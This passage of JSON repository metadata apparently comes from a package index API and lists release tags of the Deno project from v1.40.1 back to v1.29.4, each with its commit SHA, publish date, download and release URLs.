5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2